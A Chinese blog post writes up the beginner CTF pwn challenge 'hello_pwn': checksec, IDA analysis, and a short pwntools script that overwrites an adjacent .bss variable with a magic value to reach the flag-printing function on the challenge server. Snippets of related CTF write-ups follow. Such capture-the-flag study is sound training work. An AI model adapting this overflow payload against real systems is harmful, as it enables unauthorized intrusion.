攻防世界misc新手_攻防世界pwn新手练习(hello_pwn)

最新推荐文章于 2023-11-03 14:17:15 发布
最新推荐文章于 2023-11-03 14:17:15 发布
阅读量194 收藏
点赞数
文章标签: 攻防世界misc新手

284943a3e67b6b0f34cae4f8df3400e5.png

拿到程序后,我们首先checksec一下

0ca682a984f50c114f50e9f28743bd86.png

可以看到是64位程序,好的是这次只开了NX(堆栈不可执行),ok,我们跑一下程序看看

eaed970dfe78a93fbea5273181b3a1f5.png

可以看到它是一个输入,然后就啥都没有了emmmm....好吧,咱们继续放到IDA里面看看

88c48da7a0cbc8510304071ca90e4c8a.png

通过观察我们可以发现当dword_60106C这个变量的值为1853186401时,程序会进入一个函数中,而这个函数的作用则是抓取flag。

好了,很明显了,接下来的问题时我们如何去改变这个变量的值。通过双击查看我们可以知道dword60106Cunk601068这俩变量都在.bss段,并且dword60106C就在离unk601068四个位置的地方,而凑巧的时unk601068时可以被控制的,它是由我们输入的,而输入点给了我们10个长度的输入权限,那正好,我们可以借此覆盖掉dword60106C使它变成我们需要的数值

fa604b7753624334b302323910e443d4.png

ok了,分析结束,上exp

```python from pwn import *

context.log_level = 'debug'

r = remote('111.198.29.45', 42136)

payload = 'A' * 4 + p64(1853186401)

r.recvuntil("lets get helloworld for bofn") r.sendline(payload) print r.recv() ``` 我们瞅一下运行结果

be4c758c487e0957b8fa65c9dd06848f.png

最后放一下我的博客(http://www.sailingplace.cn),有兴趣的可以来看看(萌新的小天地,轻点喷)

ok,nice!我们下次见。

weixin_39719018
关注
初学pwn-攻防世界(hello_pwn)
天柱的博客
08-26 3493
初学pwn-writeUp 攻防世界的第二道题目,hello_pwn。 首先创建场景,使用nc进入远端,发现他只输出了一串字符串,没有别的内容,也无法使用ls查看它的文件。 下载场景提供的文件,使用cat查看,发现是ELF文件,按照大佬的流程,ELF文件直接用ida打开。 初次使用ida,深切的感受到了ida的强大。 打开之后,按F5,进行反编译,可以看到main函数的伪代码 可以从main函数中看到,这里存在一个判断,如果条件达成的话,会调用一个函数。点开函数看一下。 可以发现里边会输出flag.tx
攻防世界-pwn-新手-hello_pwn
weixin_31610083的博客
10-16 259
【题目描述】 Pwn! Segment fault!菜鸡陷入了深思 【附件】 在线场景和文件 【过程及思路】 放到linux下,checksec一下,检查程序位数。 发现是64位的程序。 放进IDA,找到main函数,F5反编译得到下图。 第7行,程序读取从起始位置开始的10个长度,也就是说我们有10个长度的写入权限。 第8行,判断指定位置是否是某个值。 第9行,函数的功能是cat flag.txt,我们从这个条件入手,构造出程序要求的值。 进到值条件判断的位...
攻防世界闯关记录_pwn新手
s1054436218的博客
10-02 721
  开个新坑,记录自己刷XCTF攻防世界pwn题,因为刚入门吧,从新手篇开始练起。这次一边做题一边写笔记和writeup,巩固一下自己学到的东西。 get_shell   这道题我不太想写writeup……做过的人肯定明白 CGfsb   这道题其实是一道非常简单的格式化字符串题,凭借着自己对格式化字符串的记忆,以及大量动态调试,最后还是把这道题做出来了。记录一下自己调试的过程吧,随便找...
从今天开始入门pwn了,misc简直不当人了!!!
hu_c_t_f的博客
05-11 765
学了半年CTF,misc花的时间是最多的,然后还会一点web(审计简单的js文件还是会做的,比如2023年的iscc练武题羊了个羊,十多分钟就做出来了,而misc的第一个练武题,做了1个多小时,主要是一下子没想到)此外在NKCTF和GDOUCTF中misc出题竟然是最少的,我作为misc手直接坐牢。。。。在NKCTF打社工,GDOUCTF打密码(misc现状)
攻防世界misc新手_攻防世界pwn新手练习(CGfsb)
weixin_39622178的博客
12-09 89
ok,按照惯例,拿到程序后先扔到Linux下查一下基本信息 32位程序,开了NX(堆栈不可执行)以及CANNARY(栈保护) 貌似有一丝丝头疼嗷,咱们运行一下,看看它的程序逻辑 唔,是一个留言板,可以输入的地方有两处,一处是名字,一处是留言内容。ok,可以扔进IDA分析了。 F5后直接看程序伪代码 很明显,我们需要让pwnme这个变量的值等于8,然后便可以拿到flag文件中的东西,这个时候 我们需...
攻防世界MISC新手区 give_you_flag
liver100day的博客
10-11 1999
攻防世界MISC新手区 give_you_flag 下载题目附件,是一个gif动图 题目提示我们文件中的彩蛋,看到了一瞥而过的二维码 我这里使用的是Stegsolve工具拿取二维码,打开文件,选择Frame Browser 功能 在50页,我们就发现了我们想要的二维码 保存下来查看,却发现二维码并不完整,缺少了部分东西 我们这里吧空余部分补上 然后使用二维码识图工具识别,使用手机扫描识别或许会扫不出来 成功扫描出flag flag{e7d478cf6b915f50ab1277f78502a2
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界-MISC:a_good_idea
m0_56161093的博客
01-09 2082
这是攻防世界高手进阶区的第十题,题目如下: 点击下载附件一,解压后得到一张图片,把图片放到kali用binwalk查看一下,果然包含了几个文件, 用命令把文件分离出来, 得到一个misc文件和一个压缩包 在misc的文件中由两张一样的图片(命名不同),还有一个hint.txt文件,打开后得到如下提示: 让我们去查看像素,结果还是没有什么发现,尝试将这两张图片合并,用stegsolve先打开to.png文件 ,让后点击Analyse,再选择Image Combiner 然后再选择to_to.png
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界misc新手_攻防世界pwn新手练习(when_did_you_born)
weixin_39936310的博客
12-09 64
ok 多余的话就不继续累赘了昂,直接上手 程序同上次一样开了NX(堆栈不可执行)和CANNARY(栈保护)。接下来我们首先运行一遍程序一个没什么意义的程序...注意他的输入的有两处 ok,接下来我们用IDA直接看代码 很明显的可以看到当输入的年份为1926时可以得到flag。但是有个问题,在年份输入后它会有个判断当年份为1926时会报错并跳出... emmm。。。。。。这怎么搞全文看一下我们可以发...
CTF---MISC详解
最新发布
weixin_52796034的博客
11-03 4242
Misc 是英文 Miscellaneous 的前四个字母,杂项、混合体、大杂烩的意思。 Recon(信息搜集) 主要介绍一些获取信息的渠道和一些利用百度、谷歌等搜索引擎的技巧 Encode(编码转换) 主要介绍在 CTF 比赛中一些常见的编码形式以及转换的技巧和常见方式 Forensic && Stego(数字取证 && 隐写分析) 隐写取证是 Misc 中最为重要的一块,包括文件分析、隐写、内存镜像分析和流量抓包分析等等, 涉及巧妙的编码、隐藏数据、层层嵌套的文件中的文件,灵活利用搜索引擎获取所需
赛题类型 Web、Crypto、Pwn、Reverse、Misc 各是指什么意思?
热门推荐
Sumarua的博客
07-26 1万+
赛题类型 Web、Crypto、Pwn、Reverse、Misc 各是指什么意思? 一般我们在参加一些”网络安全技能大赛“的时候,都会出现“Web、Crypto、Pwn、Reverse 、Misc”这五种赛题类型,往往很多新手都不清楚各是什么意思?代表了哪些方向? 今天就简单的给大家说说,具体如下: Web(渗透测试) 一般是指web网站渗透、漏洞利用。 例如:命令注入、 SQL注入、代码审计、 Restful API、Owasp10、BurpSuite。 Crypto(密码学) 主要是针对一些密码学,例如
Linux 设备驱动编写(misc
weixin_41544435的博客
07-12 2066
misc device
Linux设备驱动开发入门之——hello驱动
luobeihai的博客
04-05 3547
1. Linux驱动程序的分类 Linux 中主要分为三大类驱动:字符设备驱动、块设备驱动和网络设备驱动。 1、字符设备驱动:因为软件操作设备是是以字节为单位进行的,是按照字节流进行读写操作的一种设备。典型的如LCD、蜂鸣器、SPI、触摸屏等驱动,都属于字符设备驱动的范畴。大部分的驱动程序都是属于字符设备驱动。 2、块设备驱动:块设备驱动是相对于字符设备驱动而定义的,因为块设备被软件操作时,是以块为单位进行操作的(块指的是多个字节组成一个块)。块设备大多指的都是各种存储类类设备,比如EMMC、SD卡、NAN
CTF常见题型
阳光心态,健康人生的博客
12-19 1万+
CTF常见题型: CTF比赛通常包含的题目类型包括MISC、PPC、CRYPTO、PWN、REVERSE、WEB、STEGA。 MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。PPC(Professionally Program Coder)类型,即编程类题目,题目涉及到编程算法,相比ACM较为容易。CRYPTO(Cryptogra
记一次院赛CTF的PwnMisc题(入门)
CTF小白的博客
04-14 3324
目录Pwneasy pwn莽撞人反向读取Miscdrop the beats拼东东消失的50px Pwn 见到别的比赛的pwn题才幡然醒悟,已经没有比这些更简单的pwn题了。 easy pwn 首先,拿到Pwn题的第一步,看是64位还是32位 第二步 gdb看开了哪些保护 【1】Canary:Canary保护机制的原理,是在一个函数入口处从fs段内获取一个随机值,一般存到EBP - 0x4(3...
攻防世界misc新手_攻防世界pwn新手练习(cgpwn2)
weixin_39757212的博客
12-09 88
cgpwn2 题目链接分析我们来看这道题,首先checksec并运行一下可以看到是32位程序,有两个输入点,保护只有 NX。接下来我们在ida中看看分析。在hello函数的最后我们可以看到这些东西这就是程序给我们的两个输入点,可以看到第二个是 gets ,那就很方便了,直接溢出利用就行,翻看其他函数我们可以发现有一个system函数很遗憾的是只有system函数而没有我们需要的shellcode看...
i春秋第二届春秋欢乐赛CryMisc题目WriteUp
iqiqiya的博客
04-24 4443
CryMisc__writeup把CryMisc.zip解密后得到crypto.zip和jiami.py,crypto.zip是被加密过的,而jiami.py则是加密脚本,  其中密码是随机的15位字符的md5值,基本不可能爆破,而这里是使用本身这个jiami.py和gogogo.zip一起加密成crypto.zip,这里就存在着zip的明文攻击,用winrar(不能用7zip或者好压)把...
攻防世界misc1-misc
08-29
很抱歉,但是根据提供的引用内容,没有找到关于攻防世界misc1-misc的具体信息。如果有更多的信息或者题目细节,请提供更多内容,我会尽力为您解答。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [攻防世界misc2-1杂项](https://download.csdn.net/download/m0_59188912/87094620)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [攻防世界misc进阶(1~10关)](https://blog.csdn.net/weixin_53105784/article/details/115310984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值